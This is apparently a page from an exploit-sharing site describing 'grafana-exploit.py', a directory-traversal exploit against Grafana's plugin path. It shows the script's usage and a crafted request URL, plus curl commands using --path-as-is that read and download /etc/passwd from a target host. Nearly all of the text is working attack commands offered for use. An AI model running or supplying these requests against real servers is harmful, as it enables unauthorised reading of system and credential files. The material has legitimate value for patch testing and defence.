Share
## https://sploitus.com/exploit?id=6361D456-F76C-5B4C-9111-60E3F23BA63F
usage: grafana-exploit.py [-h] -H/--host HOST
grafana-exploit.py: error: the following arguments are required: -H/--host
example: python3 grafana-exploit.py --host <target_host>
if successfuly read arbitary-file situation
show the request URL and curl command
```
[+]RequestURL
http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd
[+]curl_command
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd"
```
so if you wanna download file execute like above
```
curl --path-as-is "http://example.host/public/plugins/loki/../../../../../../../../../../../../../etc/passwd" -o passwd
```